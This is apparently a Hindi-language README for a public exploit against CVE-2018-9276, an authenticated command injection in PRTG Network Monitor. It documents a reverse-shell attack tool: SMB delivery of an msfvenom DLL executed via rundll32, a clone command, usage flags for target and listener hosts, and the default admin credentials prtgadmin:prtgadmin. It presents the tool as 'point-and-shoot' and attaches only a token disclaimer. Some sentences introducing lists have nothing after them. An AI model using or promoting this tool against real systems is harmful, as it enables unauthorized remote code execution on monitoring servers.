
CVE-2018-9276 PRTG < 18.2.39 प्रमाणित कमांड इंजेक्शन (रिवर्स शेल)
https://nvd.nist.gov/vuln/detail/CVE-2018-9276
https://github.com/M4LV0 द्वारा लिखे गए एक्सप्लॉयट का बेहतर संस्करण। मैंने उनकी स्क्रिप्ट से POST डेटा लिया, लेकिन इसे अधिक विश्वसनीय बना दिया क्योंकि मुझे उससे ज़्यादा सफलता नहीं मिली थी।
पेलोड डिलीवरी मूल रूप से smb_delivery है। Impacket msfvenom द्वारा जनरेट की गई .dll को सर्व करता है, बाकी काम rundll32.exe करता है।
Windows Server 2016 पर PRTG 18.1.37 के विरुद्ध परीक्षित।
यह किसी भी तरह से अच्छी तरह से नहीं लिखा गया है और इसे stackoverflow से इकट्ठा करके जोड़ा गया है। इसे Kali Linux के साथ उपयोग के लिए विकसित किया गया था और यह मानता है कि निम्नलिखित उपलब्ध हैं:
यह एक पॉइंट-एंड-शूट एक्सप्लॉयट है, आपको केवल PRTG इंस्टेंस के एडमिन क्रेडेंशियल्स जानने की आवश्यकता है (डिफ़ॉल्ट prtgadmin:prtgadmin)। लक्ष्य मशीन के कॉन्फ़िगरेशन के आधार पर, आपका अनुभव भिन्न हो सकता है। निम्नलिखित मान्यताएँ बनाई गई हैं:
git clone https://github.com/wildkindcc/CVE-2018-9276.git
python CVE-2018-9276.py -h
क्रेडेंशियल्स पता करें और शेल गिराएँ :)
usage: CVE-2018-9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
[--user USER] [--password PASSWORD] [--https]
optional arguments:
-h, --help show this help message and exit
-i HOST, --host HOST IP address / Hostname of vulnerable PRTG server
-p PORT, --port PORT Port number
--lhost LHOST LHOST for MSFVENOM
--lport LPORT LPORT for MSFVENOM
--user USER Administrator Username
--password PASSWORD Administrator Password
--https Negotiate SSL connection to the server (Requires
socket to be compiled with SSL support)
यह आपको Gibson हैक नहीं करने देगा। इसका उपयोग किसी भी सिस्टम के विरुद्ध न करें जिसके लिए आप अधिकृत नहीं हैं। मैंने इसे मनोरंजन के लिए लिखा था। केवल शैक्षिक उद्देश्यों के लिए, वगैरह-वगैरह।